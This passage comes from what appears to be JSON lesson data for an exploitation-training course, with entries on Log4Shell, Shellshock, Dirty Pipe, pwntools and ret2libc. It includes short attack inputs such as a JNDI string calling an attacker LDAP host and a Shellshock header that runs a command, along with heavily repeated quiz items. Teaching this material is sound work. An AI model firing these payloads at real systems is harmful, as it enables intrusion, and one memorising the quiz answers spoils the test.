addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"eternalblue","cat":"Exploitation","title":"EternalBlue MS17-010","diff":2,"xp":150,"intro":"Famous SMB exploit.","sections":[{"type":"text","content":"Famous SMB exploit."},{"type":"code","lang":"bash","content":"nmap --script=smb-vuln-ms17-010 -p 445 target"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"EternalBlue protocol?","opts":["HTTP","SMB (445)","RDP","SSH"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"log4shell","cat":"Exploitation","title":"Log4Shell","diff":2,"xp":175,"intro":"Log4j JNDI injection.","sections":[{"type":"text","content":"Log4j JNDI injection."},{"type":"code","lang":"bash","content":"${jndi:ldap://attacker:1389/exploit}\n# Inject into User-Agent, X-Forwarded-For"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Log4Shell abuses?","opts":["Serialization","JNDI","JMX","RMI"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"shellshock","cat":"Exploitation","title":"Shellshock","diff":1,"xp":100,"intro":"Bash function vuln.","sections":[{"type":"text","content":"Bash function vuln."},{"type":"code","lang":"bash","content":"curl -H 'User-Agent: () { :; }; /bin/id' http://target/cgi-bin/test.sh"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Shellshock exploits?","opts":["Apache","Bash function parsing","PHP","Python"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"heartbleed","cat":"Exploitation","title":"Heartbleed","diff":1,"xp":100,"intro":"OpenSSL memory leak.","sections":[{"type":"text","content":"OpenSSL memory leak."},{"type":"code","lang":"bash","content":"nmap --script=ssl-heartbleed -p 443 target"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Heartbleed leaks?","opts":["Files","Up to 64KB server memory","DB records","Source"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"dirty-pipe","cat":"Exploitation","title":"Dirty Pipe","diff":3,"xp":200,"intro":"Linux pipe page cache bug.","sections":[{"type":"text","content":"Linux pipe page cache bug."},{"type":"code","lang":"bash","content":"./dirtypipe /usr/bin/su 1 ...\n# Overwrites any readable file"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Dirty Pipe exploits?","opts":["Syscalls","Pipe splice buffer","Sockets","Shared memory"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"pwntools","cat":"Exploitation","title":"Pwntools","diff":2,"xp":150,"intro":"Python exploit framework.","sections":[{"type":"text","content":"Python exploit framework."},{"type":"code","lang":"python","content":"from pwn import *\np=remote('target',1337)\np.sendline(flat(b'A'*76,p64(win)))\np.interactive()"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"CTF exploit library?","opts":["socket","pwntools","scapy","requests"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"gdb-debug","cat":"Exploitation","title":"GDB for Exploits","diff":2,"xp":150,"intro":"Debug with GDB.","sections":[{"type":"text","content":"Debug with GDB."},{"type":"code","lang":"bash","content":"gdb ./binary\nrun $(python3 -c 'print(\"A\"*100)')\ninfo registers"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Popular GDB plugin?","opts":["Valgrind","GEF/pwndbg","strace","ltrace"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ret2libc","cat":"Exploitation","title":"Return-to-libc","diff":2,"xp":175,"intro":"Call libc to bypass NX.","sections":[{"type":"text","content":"Call libc to bypass NX."},{"type":"code","lang":"python","content":"# Call system('/bin/sh') from libc\nsystem = libc.symbols['system']\nbinsh = next(libc.search(b'/bin/sh'))"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"ret2libc bypasses?","opts":["ASLR","NX/DEP","Canaries","PIE"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network 